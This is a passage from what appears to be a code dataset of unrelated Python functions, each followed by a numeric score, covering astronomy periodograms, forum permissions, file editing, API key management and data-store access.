'nbestperiods':nbestperiods,
'lspvals':lsp,
'frequencies':frequencies,
'periods':periods,
'durations':[x['durations'] for x in results],
'blsresult':[x['blsresult'] for x in results],
'blsmodel':[x['blsmodel'] for x in results],
'stepsize':stepsize,
'nfreq':nfreq,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'method':'bls',
'kwargs':{'startp':startp,
'endp':endp,
'stepsize':stepsize,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'ndurations':ndurations,
'blsobjective':blsobjective,
'blsmethod':blsmethod,
'blsoversample':blsoversample,
'autofreq':autofreq,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}
}
return resultdict
else:
LOGERROR('no good detections for these times and mags, skipping...')
return {'bestperiod':npnan,
'bestlspval':npnan,
'nbestinds':None,
'nbestpeaks':nbestpeaks,
'nbestlspvals':None,
'nbestperiods':None,
'lspvals':None,
'periods':None,
'durations':None,
'blsresult':None,
'blsmodel':None,
'stepsize':stepsize,
'nfreq':None,
'nphasebins':None,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'method':'bls',
'kwargs':{'startp':startp,
'endp':endp,
'stepsize':stepsize,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'ndurations':ndurations,
'blsobjective':blsobjective,
'blsmethod':blsmethod,
'blsoversample':blsoversample,
'autofreq':autofreq,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}} | 0.004924 |
def can_subscribe_to_topic(self, topic, user):
""" Given a topic, checks whether the user can add it to their subscription list. """
# A user can subscribe to topics if they are authenticated and if they have the permission
# to read the related forum. Of course a user can subscribe only if they have not already
# subscribed to the considered topic.
return (
user.is_authenticated and
not topic.has_subscriber(user) and
self._perform_basic_permission_check(topic.forum, user, 'can_read_forum')
) | 0.010327 |
def example_exc_handler(tries_remaining, exception, delay):
"""Example exception handler; prints a warning to stderr.
tries_remaining: The number of tries remaining.
exception: The exception instance which was raised.
"""
print >> stderr, "Caught '{0}', {1} tries remaining, \
sleeping for {2} seconds".format(exception, tries_remaining, delay) | 0.002703 |
def fileset(self, name, from_study=None, format=None): # @ReservedAssignment @IgnorePep8
"""
Gets the fileset named 'name' produced by the Study named 'study' if
provided. If a spec is passed instead of a str to the name argument,
then the study will be set from the spec iff it is derived
Parameters
----------
name : str | FilesetSpec
The name of the fileset or a spec matching the given name
from_study : str | None
Name of the study that produced the fileset if derived. If None
and a spec is passed instaed of string to the name argument then
the study name will be taken from the spec instead.
format : FileFormat | str | None
Either the format of the fileset to return or the name of the
format. If None and only a single fileset is found for the given
name and study then that is returned otherwise an exception is
raised
"""
if isinstance(name, BaseFileset):
if from_study is None and name.derived:
from_study = name.study.name
name = name.name
try:
format_dct = self._filesets[(name, from_study)]
except KeyError:
available = [
('{}(format={})'.format(f.name, f._resource_name)
if f._resource_name is not None else f.name)
for f in self.filesets if f.from_study == from_study]
other_studies = [
(f.from_study if f.from_study is not None else '<root>')
for f in self.filesets if f.name == name]
if other_studies:
msg = (". NB: matching fileset(s) found for '{}' study(ies) "
"('{}')".format(name, "', '".join(other_studies)))
else:
msg = ''
raise ArcanaNameError(
name,
("{} doesn't have a fileset named '{}'{} "
"(available '{}'){}"
.format(self, name,
(" from study '{}'".format(from_study)
if from_study is not None else ''),
"', '".join(available), msg)))
else:
if format is None:
all_formats = list(format_dct.values())
if len(all_formats) > 1:
raise ArcanaNameError(
"Multiple filesets found for '{}'{} in {} with formats"
" {}. Need to specify a format"
.format(name, ("in '{}'".format(from_study)
if from_study is not None else ''),
self, "', '".join(format_dct.keys())))
fileset = all_formats[0]
else:
try:
if isinstance(format, str):
fileset = format_dct[format]
else:
try:
fileset = format_dct[format.ext]
except KeyError:
fileset = None
for rname, rfileset in format_dct.items():
if rname in format.resource_names(
self.tree.repository.type):
fileset = rfileset
break
if fileset is None:
raise
except KeyError:
raise ArcanaNameError(
format,
("{} doesn't have a fileset named '{}'{} with "
"format '{}' (available '{}'){}"
.format(self, name,
(" from study '{}'".format(from_study)
if from_study is not None else ''),
format,
"', '".join(format_dct.keys()), msg)))
return fileset | 0.001206 |
def start(st_reg_number):
"""Checks the number valiaty for the Alagoas state"""
if len(st_reg_number) > 9:
return False
if len(st_reg_number) < 9:
return False
if st_reg_number[0:2] != "24":
return False
if st_reg_number[2] not in ['0', '3', '5', '7', '8']:
return False
aux = 9
sum_total = 0
for i in range(len(st_reg_number)-1):
sum_total = sum_total + int(st_reg_number[i]) * aux
aux -= 1
product = sum_total * 10
aux_2 = int(product/11)
digit = product - aux_2 * 11
if digit == 10:
digit = 0
return digit == int(st_reg_number[len(st_reg_number)-1]) | 0.001493 |
def motion_detection_sensitivity(self):
"""Sensitivity level of Camera motion detection."""
if not self.triggers:
return None
for trigger in self.triggers:
if trigger.get("type") != "pirMotionActive":
continue
sensitivity = trigger.get("sensitivity")
if sensitivity:
return sensitivity.get("default")
return None | 0.004684 |
def dumps(value):
"""
Dumps a data structure to TOML source code.
The given value must be either a dict of dict values, a dict, or a TOML file constructed by this module.
"""
from contoml.file.file import TOMLFile
if not isinstance(value, TOMLFile):
raise RuntimeError("Can only dump a TOMLFile instance loaded by load() or loads()")
return value.dumps() | 0.007614 |
def createJSON(g, full=True):
"""
Create JSON compatible dictionary from current settings
Parameters
----------
g : hcam_drivers.globals.Container
Container with globals
"""
data = dict()
if 'gps_attached' not in g.cpars:
data['gps_attached'] = 1
else:
data['gps_attached'] = 1 if g.cpars['gps_attached'] else 0
data['appdata'] = g.ipars.dumpJSON()
data['user'] = g.rpars.dumpJSON()
if full:
data['hardware'] = g.ccd_hw.dumpJSON()
data['tcs'] = g.info.dumpJSON()
if g.cpars['telins_name'].lower() == 'gtc' and has_corba:
try:
s = get_telescope_server()
data['gtc_headers'] = dict(
create_header_from_telpars(s.getTelescopeParams())
)
except:
g.clog.warn('cannot get GTC headers from telescope server')
return data | 0.002174 |
def divide(elements, by, translate=False, sep=' '):
"""Divide lists `elements` and `by`.
All elements are grouped into N bins, where N denotes the elements in `by` list.
Parameters
----------
elements: list of dict
Elements to be grouped into bins.
by: list of dict
Elements defining the bins.
translate: bool (default: False)
When dividing, also translate start and end positions of elements.
sep: str (default ' ')
In case of multispans, what is the default text separator.
This is required in order to tag correct start, end positions of elements.
"""
outer_spans = [spans(elem) for elem in by]
return divide_by_spans(elements, outer_spans, translate=translate, sep=sep) | 0.003958 |
def transform(self, y):
"""Transform labels to normalized encoding.
Parameters
----------
y : ArrayRDD [n_samples]
Target values.
Returns
-------
y : ArrayRDD [n_samples]
"""
mapper = super(SparkLabelEncoder, self).transform
mapper = self.broadcast(mapper, y.context)
return y.transform(mapper) | 0.005076 |
def fit_content(self, verbose=False):
"""
Zooms out the current view in order to display all of its elements.
:param verbose: print more
"""
PARAMS={}
response=api(url=self.__url+"/fit content", PARAMS=PARAMS, method="POST", verbose=verbose)
return response | 0.015873 |
def set_simulation_duration(self, simulation_duration):
"""
set the simulation_duration
see: http://www.gsshawiki.com/Project_File:Required_Inputs
"""
self.project_manager.setCard('TOT_TIME', str(simulation_duration.total_seconds()/60.0))
super(EventMode, self).set_simulation_duration(simulation_duration)
self.simulation_duration = simulation_duration | 0.007335 |
def node_filters(self):
""" Dict[str, NodeFilter]: Returns the node filters for this selector. """
return {
name: filter for name, filter in iter(self.filters.items())
if isinstance(filter, NodeFilter)} | 0.012346 |
def use_form(form_class, request=None, **top_kwargs):
"""
Validate request (query_params or request body with args from url) with serializer and pass
validated data dict to the view function instead of request object.
"""
def validated_form(request, **kwargs):
# import ipdb; ipdb.set_trace()
data = request.query_params.dict() if request.method in ['GET'] else request.data
if isinstance(data, QueryDict):
form = form_class(data={**data.dict(), **kwargs})
elif isinstance(data, dict):
form = form_class(data={**data, **kwargs})
else:
form = form_class(data=data, **kwargs)
form.is_valid(raise_exception=True)
return form
if request:
kwargs = {}
if request.resolver_match:
kwargs = {**request.resolver_match.kwargs}
if top_kwargs:
kwargs = {**kwargs, **top_kwargs}
return validated_form(request, **kwargs).validated_data
def wrap(func):
def method_wrap(view, request, *args, **kwargs):
form = validated_form(request, **kwargs)
if hasattr(view, 'log'):
form.log = view.log
return func(view, form.validated_data, *args, **kwargs)
def function_wrap(request, *args, **kwargs):
form = validated_form(request, **kwargs)
return func(form.validated_data, *args, **kwargs)
def inner(*args, **kwargs):
is_method = isinstance(args[0], APIView)
return (method_wrap if is_method else function_wrap)(*args, **kwargs)
return inner
return wrap | 0.002429 |
def publish_active_scene(self, scene_id):
"""publish changed active scene"""
self.sequence_number += 1
self.publisher.send_multipart(msgs.MessageBuilder.scene_active(self.sequence_number, scene_id))
return self.sequence_number | 0.011628 |
def _updateEmissionProbabilities(self):
"""Sample a new set of emission probabilites from the conditional distribution P(E | S, O)
"""
observations_by_state = [self.model.collect_observations_in_state(self.observations, state)
for state in range(self.model.nstates)]
self.model.output_model.sample(observations_by_state) | 0.010363 |
def delete(self, template_id, session):
'''taobao.delivery.template.delete 删除运费模板
根据用户指定的模板ID删除指定的模板'''
request = TOPRequest('taobao.delivery.template.delete')
request['template_id'] = template_id
self.create(self.execute(request, session), fields=['complete', ])
return self.complete | 0.008798 |
def generate_random_string(template_dict, key='start'):
"""Generates a random excuse from a simple template dict.
Based off of drow's generator.js (public domain).
Grok it here: http://donjon.bin.sh/code/random/generator.js
Args:
template_dict: Dict with template strings.
key: String with the starting index for the dict. (Default: 'start')
Returns:
Generated string.
"""
data = template_dict.get(key)
#if isinstance(data, list):
result = random.choice(data)
#else:
#result = random.choice(data.values())
for match in token_regex.findall(result):
word = generate_random_string(template_dict, match) or match
result = result.replace('{{{0}}}'.format(match), word)
return result | 0.00641 |
def _run(self):
"""Run method that can be profiled"""
self.set_state(self.STATE_INITIALIZING)
self.ioloop = ioloop.IOLoop.current()
self.consumer_lock = locks.Lock()
self.sentry_client = self.setup_sentry(
self._kwargs['config'], self.consumer_name)
try:
self.setup()
except (AttributeError, ImportError):
return self.on_startup_error(
'Failed to import the Python module for {}'.format(
self.consumer_name))
if not self.is_stopped:
try:
self.ioloop.start()
except KeyboardInterrupt:
LOGGER.warning('CTRL-C while waiting for clean shutdown') | 0.002717 |
def QA_SU_save_etf_list(client=DATABASE, ui_log=None, ui_progress=None):
"""save etf_list
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
try:
QA_util_log_info(
'##JOB16 Now Saving ETF_LIST ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=5000
)
etf_list_from_tdx = QA_fetch_get_stock_list(type_="etf")
pandas_data = QA_util_to_json_from_pandas(etf_list_from_tdx)
if len(pandas_data) > 0:
# 获取到数据后才进行drop collection 操作
client.drop_collection('etf_list')
coll = client.etf_list
coll.create_index('code')
coll.insert_many(pandas_data)
QA_util_log_info(
"完成ETF列表获取",
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=10000
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
print(" Error save_tdx.QA_SU_save_etf_list exception!")
pass | 0.000936 |
def consume_keys_asynchronous_threads(self):
"""
Work through the keys to look up asynchronously using multiple threads
"""
print("\nLooking up " + self.input_queue.qsize().__str__() + " keys from " + self.source_name + "\n")
jobs = multiprocessing.cpu_count()*4 if (multiprocessing.cpu_count()*4 < self.input_queue.qsize()) \
else self.input_queue.qsize()
pool = ThreadPool(jobs)
for x in range(jobs):
pool.apply(self.data_worker, [], self.worker_args)
pool.close()
pool.join() | 0.006932 |
def enumerate_keyword_args(tokens):
"""
Iterates over *tokens* and returns a dictionary with function names as the
keys and lists of keyword arguments as the values.
"""
keyword_args = {}
inside_function = False
for index, tok in enumerate(tokens):
token_type = tok[0]
token_string = tok[1]
if token_type == tokenize.NEWLINE:
inside_function = False
if token_type == tokenize.NAME:
if token_string == "def":
function_name = tokens[index+1][1]
inside_function = function_name
keyword_args.update({function_name: []})
elif inside_function:
if tokens[index+1][1] == '=': # keyword argument
keyword_args[function_name].append(token_string)
return keyword_args | 0.002384 |
def create(cls, **kwargs):
"""Initializes a new instance, adds it to the db and commits
the transaction.
Args:
**kwargs: The keyword arguments for the init constructor.
Examples:
>>> user = User.create(name="Vicky", email="[email protected]")
>>> user.id
35
"""
try:
return cls.add(cls.new(**kwargs))
except:
cls.session.rollback()
raise | 0.006316 |
def avg_pool(arr, block_size, cval=0, preserve_dtype=True):
"""
Resize an array using average pooling.
dtype support::
See :func:`imgaug.imgaug.pool`.
Parameters
----------
arr : (H,W) ndarray or (H,W,C) ndarray
Image-like array to pool. See :func:`imgaug.pool` for details.
block_size : int or tuple of int or tuple of int
Size of each block of values to pool. See :func:`imgaug.pool` for details.
cval : number, optional
Padding value. See :func:`imgaug.pool` for details.
preserve_dtype : bool, optional
Whether to preserve the input array dtype. See :func:`imgaug.pool` for details.
Returns
-------
arr_reduced : (H',W') ndarray or (H',W',C') ndarray
Array after average pooling.
"""
return pool(arr, block_size, np.average, cval=cval, preserve_dtype=preserve_dtype) | 0.004535 |
def psed(path,
before,
after,
limit='',
backup='.bak',
flags='gMS',
escape_all=False,
multi=False):
'''
.. deprecated:: 0.17.0
Use :py:func:`~salt.modules.file.replace` instead.
Make a simple edit to a file (pure Python version)
Equivalent to:
.. code-block:: bash
sed <backup> <options> "/<limit>/ s/<before>/<after>/<flags> <file>"
path
The full path to the file to be edited
before
A pattern to find in order to replace with ``after``
after
Text that will replace ``before``
limit : ``''``
An initial pattern to search for before searching for ``before``
backup : ``.bak``
The file will be backed up before edit with this file extension;
**WARNING:** each time ``sed``/``comment``/``uncomment`` is called will
overwrite this backup
flags : ``gMS``
Flags to modify the search. Valid values are:
- ``g``: Replace all occurrences of the pattern, not just the first.
- ``I``: Ignore case.
- ``L``: Make ``\\w``, ``\\W``, ``\\b``, ``\\B``, ``\\s`` and ``\\S``
dependent on the locale.
- ``M``: Treat multiple lines as a single line.
- ``S``: Make `.` match all characters, including newlines.
- ``U``: Make ``\\w``, ``\\W``, ``\\b``, ``\\B``, ``\\d``, ``\\D``,
``\\s`` and ``\\S`` dependent on Unicode.
- ``X``: Verbose (whitespace is ignored).
multi: ``False``
If True, treat the entire file as a single line
Forward slashes and single quotes will be escaped automatically in the
``before`` and ``after`` patterns.
CLI Example:
.. code-block:: bash
salt '*' file.sed /etc/httpd/httpd.conf 'LogLevel warn' 'LogLevel info'
'''
# Largely inspired by Fabric's contrib.files.sed()
# XXX:dc: Do we really want to always force escaping?
#
# Mandate that before and after are strings
path = os.path.expanduser(path)
multi = bool(multi)
before = six.text_type(before)
after = six.text_type(after)
before = _sed_esc(before, escape_all)
# The pattern to replace with does not need to be escaped!!!
# after = _sed_esc(after, escape_all)
limit = _sed_esc(limit, escape_all)
shutil.copy2(path, '{0}{1}'.format(path, backup))
with salt.utils.files.fopen(path, 'w') as ofile:
with salt.utils.files.fopen('{0}{1}'.format(path, backup), 'r') as ifile:
if multi is True:
for line in ifile.readline():
ofile.write(
salt.utils.stringutils.to_str(
_psed(
salt.utils.stringutils.to_unicode(line),
before,
after,
limit,
flags
)
)
)
else:
ofile.write(
salt.utils.stringutils.to_str(
_psed(
salt.utils.stringutils.to_unicode(ifile.read()),
before,
after,
limit,
flags
)
)
) | 0.00058 |
def enurlform_app(parser, cmd, args): # pragma: no cover
"""
encode a series of key=value pairs into a query string.
"""
parser.add_argument('values', help='the key=value pairs to URL encode', nargs='+')
args = parser.parse_args(args)
return enurlform(dict(v.split('=', 1) for v in args.values)) | 0.006231 |
def list_subscription(self):
'''**Description**
List all subscriptions
**Arguments**
- None
**Success Return Value**
A JSON object representing the list of subscriptions.
'''
url = self.url + "/api/scanning/v1/anchore/subscriptions"
res = requests.get(url, headers=self.hdrs, verify=self.ssl_verify)
if not self._checkResponse(res):
return [False, self.lasterr]
return [True, res.json()] | 0.003984 |
def dispatch(self):
"""Dispatch http request to registerd commands.
Example::
slack = Slack(app)
app.add_url_rule('/', view_func=slack.dispatch)
"""
from flask import request
method = request.method
data = request.args
if method == 'POST':
data = request.form
token = data.get('token')
team_id = data.get('team_id')
command = data.get('command') or data.get('trigger_word')
if isinstance(command, string_types):
command = command.strip().lstrip('/')
try:
self.validate(command, token, team_id, method)
except SlackError as e:
return self.response(e.msg)
func, _, _, kwargs = self._commands[(team_id, command)]
kwargs.update(data.to_dict())
return func(**kwargs) | 0.002301 |
def get_webpack(request, name='DEFAULT'):
"""
Get the Webpack object for a given webpack config.
Called at most once per request per config name.
"""
if not hasattr(request, '_webpack_map'):
request._webpack_map = {}
wp = request._webpack_map.get(name)
if wp is None:
wp = request._webpack_map[name] = Webpack(request, name)
return wp | 0.002611 |
def do_init_cached_fields(self):
"""
Initialize each fields of the fields_desc dict, or use the cached
fields information
"""
cls_name = self.__class__
# Build the fields information
if Packet.class_default_fields.get(cls_name, None) is None:
self.prepare_cached_fields(self.fields_desc)
# Use fields information from cache
if not Packet.class_default_fields.get(cls_name, None) is None:
self.default_fields = Packet.class_default_fields[cls_name]
self.fieldtype = Packet.class_fieldtype[cls_name]
self.packetfields = Packet.class_packetfields[cls_name]
# Deepcopy default references
for fname in Packet.class_default_fields_ref[cls_name]:
value = copy.deepcopy(self.default_fields[fname])
setattr(self, fname, value) | 0.00223 |
def _epsilon_closure(self, state):
"""
Returns the \epsilon-closure for the state given as input.
"""
closure = set([state.stateid])
stack = [state]
while True:
if not stack:
break
s = stack.pop()
for arc in s:
if self.isyms.find(arc.ilabel) != EPSILON or \
arc.nextstate in closure:
continue
closure.add(arc.nextstate)
stack.append(self.states[arc.nextstate])
return closure | 0.005217 |
def bind_to_uniform_block(self, binding=0, *, offset=0, size=-1) -> None:
'''
Bind the buffer to a uniform block.
Args:
binding (int): The uniform block binding.
Keyword Args:
offset (int): The offset.
size (int): The size. Value ``-1`` means all.
'''
self.mglo.bind_to_uniform_block(binding, offset, size) | 0.004796 |
def predecessors(self, node, exclude_compressed=True):
"""
Returns the list of predecessors of a given node
Parameters
----------
node : str
The target node
exclude_compressed : boolean
If true, compressed nodes are excluded from the predecessors list
Returns
-------
list
List of predecessors nodes
"""
preds = super(Graph, self).predecessors(node)
if exclude_compressed:
return [n for n in preds if not self.node[n].get('compressed', False)]
else:
return preds | 0.004769 |
def neighbors(self) -> List['Node']:
"""
The list of neighbors of the node.
"""
self._load_neighbors()
return [edge.source if edge.source != self else edge.target
for edge in self._neighbors.values()] | 0.007634 |
def go_to_py_cookie(go_cookie):
'''Convert a Go-style JSON-unmarshaled cookie into a Python cookie'''
expires = None
if go_cookie.get('Expires') is not None:
t = pyrfc3339.parse(go_cookie['Expires'])
expires = t.timestamp()
return cookiejar.Cookie(
version=0,
name=go_cookie['Name'],
value=go_cookie['Value'],
port=None,
port_specified=False,
# Unfortunately Python cookies don't record the original
# host that the cookie came from, so we'll just use Domain
# for that purpose, and record that the domain was specified,
# even though it probably was not. This means that
# we won't correctly record the CanonicalHost entry
# when writing the cookie file after reading it.
domain=go_cookie['Domain'],
domain_specified=not go_cookie['HostOnly'],
domain_initial_dot=False,
path=go_cookie['Path'],
path_specified=True,
secure=go_cookie['Secure'],
expires=expires,
discard=False,
comment=None,
comment_url=None,
rest=None,
rfc2109=False,
) | 0.000866 |
def _add_to_checksum(self, checksum, value):
"""Add a byte to the checksum."""
checksum = self._byte_rot_left(checksum, 1)
checksum = checksum + value
if (checksum > 255):
checksum = checksum - 255
self._debug(PROP_LOGLEVEL_TRACE, "C: " + str(checksum) + " V: " + str(value))
return checksum | 0.008547 |
def list_files(dirname, extension=None):
"""
List all files in directory `dirname`, option to filter on file extension
"""
f = []
for (dirpath, dirnames, filenames) in os.walk(dirname):
f.extend(filenames)
break
if extension is not None:
# Filter on extension
filtered = []
for filename in f:
fn, ext = os.path.splitext(filename)
if ext.lower() == '.' + extension.lower():
filtered.append(filename)
f = filtered
return f | 0.001866 |
def _remove_processed_data(
self):
"""*remove processed data*
"""
self.log.info('starting the ``_remove_processed_data`` method')
archivePath = self.settings["atlas archive path"]
from fundamentals.mysql import readquery
sqlQuery = u"""
select mjd from (SELECT DISTINCT
FLOOR(mjd) as mjd
FROM
atlas_exposures
WHERE
local_data = 1 AND dophot_match > 0) as a
where mjd NOT IN (SELECT
*
FROM
(SELECT DISTINCT
FLOOR(mjd)
FROM
atlas_exposures
WHERE
local_data = 1 AND dophot_match = 0) AS a);
""" % locals()
mjds = readquery(
log=self.log,
sqlQuery=sqlQuery,
dbConn=self.atlasMoversDBConn
)
if not len(mjds):
return None
oldMjds = []
oldMjds[:] = [str(int(o["mjd"])) for o in mjds]
for m in oldMjds:
for i in ["01a", "02a"]:
datapath = archivePath + "/%(i)s/%(m)s" % locals()
# shutil.rmtree(datapath)
try:
shutil.rmtree(datapath)
except:
self.log.warning(
"The path %(datapath)s does not exist - no need to delete" % locals())
mjdString = (',').join(oldMjds)
sqlQuery = """
update day_tracker set local_data = 0 where floor(mjd) in (%(mjdString)s);
update atlas_exposures set local_data = 0 where floor(mjd) in (%(mjdString)s) and dophot_match != 0;""" % locals(
)
print sqlQuery
writequery(
log=self.log,
sqlQuery=sqlQuery,
dbConn=self.atlasMoversDBConn
)
self.log.info('completed the ``_remove_processed_data`` method')
return None | 0.003193 |
def delete_api_key(awsclient, api_key):
"""Remove API key.
:param api_key:
"""
_sleep()
client_api = awsclient.get_client('apigateway')
print('delete api key: %s' % api_key)
response = client_api.delete_api_key(
apiKey=api_key
)
print(json2table(response)) | 0.0033 |
def crps(self):
"""
Calculates the continuous ranked probability score.
"""
return np.sum(self.errors["F_2"].values - self.errors["F_O"].values * 2.0 + self.errors["O_2"].values) / \
(self.thresholds.size * self.num_forecasts) | 0.011111 |
def add_filter(self, table, cols, condition):
"""
Add a filter. When reading *table*, rows in *table* will be
filtered by filter_rows().
Args:
table: The table the filter applies to.
cols: The columns in *table* to filter on.
condition: The filter function.
"""
if table is not None and table not in self.relations:
raise ItsdbError('Cannot add filter; table "{}" is not defined '
'by the relations file.'
.format(table))
# this is a hack, though perhaps well-motivated
if cols is None:
cols = [None]
self.filters[table].append((cols, condition)) | 0.002714 |
def _build_query(self, table, tree, visitor):
""" Build a scan/query from a statement """
kwargs = {}
index = None
if tree.using:
index_name = kwargs["index"] = tree.using[1]
index = table.get_index(index_name)
if tree.where:
constraints = ConstraintExpression.from_where(tree.where)
possible_hash = constraints.possible_hash_fields()
possible_range = constraints.possible_range_fields()
if index is None:
# See if we can find an index to query on
indexes = table.get_matching_indexes(possible_hash, possible_range)
if not indexes:
action = "scan"
kwargs["filter"] = constraints.build(visitor)
kwargs["expr_values"] = visitor.expression_values
kwargs["alias"] = visitor.attribute_names
elif len(indexes) == 1:
index = indexes[0]
action = "query"
add_query_kwargs(kwargs, visitor, constraints, index)
else:
names = ", ".join([index.name for index in indexes])
raise SyntaxError(
"No index specified with USING <index>, "
"but multiple possibilities for query: "
"%s" % names
)
else:
if index.hash_key in possible_hash:
action = "query"
add_query_kwargs(kwargs, visitor, constraints, index)
else:
action = "scan"
if not index.scannable:
raise SyntaxError("Cannot scan local index %r" % index_name)
kwargs["filter"] = constraints.build(visitor)
kwargs["expr_values"] = visitor.expression_values
kwargs["alias"] = visitor.attribute_names
else:
action = "scan"
return [action, kwargs, index] | 0.001918 |
def is_permitted_collective(self, permission_s, logical_operator=all):
"""
:param permission_s: a List of authz_abcs.Permission objects
:param logical_operator: indicates whether *all* or at least one
permission check is true, *any*
:type: any OR all (functions from python stdlib)
:returns: a Boolean
"""
sm = self.security_manager
if self.authorized:
return sm.is_permitted_collective(self.identifiers,
permission_s,
logical_operator)
msg = 'Cannot check permission when user isn\'t authenticated nor remembered'
raise ValueError(msg) | 0.003953 |
def block_stats(x,y,z,ds,stat='median',bins=None):
"""Compute points on a regular grid (matching input GDAL Dataset) from scattered point data using specified statistic
Wrapper for scipy.stats.binned_statistic_2d
Note: this is very fast for mean, std, count, but bignificantly slower for median
"""
import scipy.stats as stats
extent = ds_extent(ds)
#[[xmin, xmax], [ymin, ymax]]
range = [[extent[0], extent[2]], [extent[1], extent[3]]]
if bins is None:
bins = (ds.RasterXSize, ds.RasterYSize)
if stat == 'max':
stat = np.max
elif stat == 'min':
stat = np.min
#block_count, xedges, yedges, bin = stats.binned_statistic_2d(x,y,z,'count',bins,range)
block_stat, xedges, yedges, bin = stats.binned_statistic_2d(x,y,z,stat,bins,range)
#Get valid blocks
#if (stat == 'median') or (stat == 'mean'):
if stat in ('median', 'mean', np.max, np.min):
idx = ~np.isnan(block_stat)
else:
idx = (block_stat != 0)
idx_idx = idx.nonzero()
#Cell centers
res = [(xedges[1] - xedges[0]), (yedges[1] - yedges[0])]
out_x = xedges[:-1]+res[0]/2.0
out_y = yedges[:-1]+res[1]/2.0
out_x = out_x[idx_idx[0]]
out_y = out_y[idx_idx[1]]
out_z = block_stat[idx]
return out_x, out_y, out_z | 0.016055 |
def save_profile(self, userdata, data):
""" Save user profile modifications """
result = userdata
error = False
# Check if updating username.
if not userdata["username"] and "username" in data:
if re.match(r"^[-_|~0-9A-Z]{4,}$", data["username"], re.IGNORECASE) is None:
error = True
msg = _("Invalid username format.")
elif self.database.users.find_one({"username": data["username"]}):
error = True
msg = _("Username already taken")
else:
result = self.database.users.find_one_and_update({"email": userdata["email"]},
{"$set": {"username": data["username"]}},
return_document=ReturnDocument.AFTER)
if not result:
error = True
msg = _("Incorrect email.")
else:
self.user_manager.connect_user(result["username"], result["realname"], result["email"],
result["language"])
msg = _("Profile updated.")
return result, msg, error
# Check if updating the password.
if self.app.allow_registration and len(data["passwd"]) in range(1, 6):
error = True
msg = _("Password too short.")
return result, msg, error
elif self.app.allow_registration and len(data["passwd"]) > 0 and data["passwd"] != data["passwd2"]:
error = True
msg = _("Passwords don't match !")
return result, msg, error
elif self.app.allow_registration and len(data["passwd"]) >= 6:
oldpasswd_hash = hashlib.sha512(data["oldpasswd"].encode("utf-8")).hexdigest()
passwd_hash = hashlib.sha512(data["passwd"].encode("utf-8")).hexdigest()
match = {"username": self.user_manager.session_username()}
if "password" in userdata:
match["password"] = oldpasswd_hash
result = self.database.users.find_one_and_update(match,
{"$set": {"password": passwd_hash}},
return_document=ReturnDocument.AFTER)
if not result:
error = True
msg = _("Incorrect old password.")
return result, msg, error
# Check if updating language
if data["language"] != userdata["language"]:
language = data["language"] if data["language"] in self.app.available_languages else "en"
result = self.database.users.find_one_and_update({"username": self.user_manager.session_username()},
{"$set": {"language": language}},
return_document=ReturnDocument.AFTER)
if not result:
error = True
msg = _("Incorrect username.")
return result, msg, error
else:
self.user_manager.set_session_language(language)
# Checks if updating name
if len(data["realname"]) > 0:
result = self.database.users.find_one_and_update({"username": self.user_manager.session_username()},
{"$set": {"realname": data["realname"]}},
return_document=ReturnDocument.AFTER)
if not result:
error = True
msg = _("Incorrect username.")
return result, msg, error
else:
self.user_manager.set_session_realname(data["realname"])
else:
error = True
msg = _("Name is too short.")
return result, msg, error
msg = _("Profile updated.")
return result, msg, error | 0.004639 |
def Open(self,
urn,
aff4_type=None,
mode="r",
token=None,
local_cache=None,
age=NEWEST_TIME,
follow_symlinks=True,
transaction=None):
"""Opens the named object.
This instantiates the object from the AFF4 data store.
Note that the root aff4:/ object is a container for all other
objects. Opening it for reading will instantiate a AFF4Volume instance, even
if the row does not exist.
The mode parameter specifies, how the object should be opened. A read only
mode will raise when calling Set() on it, while a write only object will
never read from the data store. Note that its impossible to open an object
with pure write support (since we have no idea what type it should be
without reading the data base) - use Create() instead for purely write mode.
Args:
urn: The urn to open.
aff4_type: If this parameter is set, we raise an IOError if the object is
not an instance of this type. This check is important when a different
object can be stored in this location. If mode is "w", this parameter
will determine the type of the object and is mandatory.
mode: The mode to open the file with.
token: The Security Token to use for opening this item.
local_cache: A dict containing a cache as returned by GetAttributes. If
set, this bypasses the factory cache.
age: The age policy used to build this object. Should be one of
NEWEST_TIME, ALL_TIMES or a time range given as a tuple (start, end) in
microseconds since Jan 1st, 1970.
follow_symlinks: If object opened is a symlink, follow it.
transaction: A lock in case this object is opened under lock.
Returns:
An AFF4Object instance.
Raises:
IOError: If the object is not of the required type.
AttributeError: If the requested mode is incorrect.
"""
if not data_store.AFF4Enabled():
raise NotImplementedError("AFF4 data store has been disabled.")
_ValidateAFF4Type(aff4_type)
if mode not in ["w", "r", "rw"]:
raise AttributeError("Invalid mode %s" % mode)
if mode == "w":
if aff4_type is None:
raise AttributeError("Need a type to open in write only mode.")
return self.Create(
urn,
aff4_type,
mode=mode,
token=token,
age=age,
force_new_version=False,
transaction=transaction)
urn = rdfvalue.RDFURN(urn)
if token is None:
token = data_store.default_token
if "r" in mode and (local_cache is None or urn not in local_cache):
local_cache = dict(self.GetAttributes([urn], age=age))
# Read the row from the table. We know the object already exists if there is
# some data in the local_cache already for this object.
result = AFF4Object(
urn,
mode=mode,
token=token,
local_cache=local_cache,
age=age,
follow_symlinks=follow_symlinks,
object_exists=bool(local_cache.get(urn)),
transaction=transaction)
result.aff4_type = aff4_type
# Now we have a AFF4Object, turn it into the type it is currently supposed
# to be as specified by Schema.TYPE.
existing_type = result.Get(result.Schema.TYPE, default="AFF4Volume")
if existing_type:
try:
result = result.Upgrade(AFF4Object.classes[existing_type])
except KeyError:
raise InstantiationError("Unable to open %s, type %s unknown." %
(urn, existing_type))
if aff4_type is not None and not isinstance(result, aff4_type):
raise InstantiationError(
"Object %s is of type %s, but required_type is %s" %
(urn, result.__class__.__name__, aff4_type.__name__))
return result | 0.005447 |
def _get_renamed_diff(self, blueprint, command, column, schema):
"""
Get a new column instance with the new column name.
:param blueprint: The blueprint
:type blueprint: Blueprint
:param command: The command
:type command: Fluent
:param column: The column
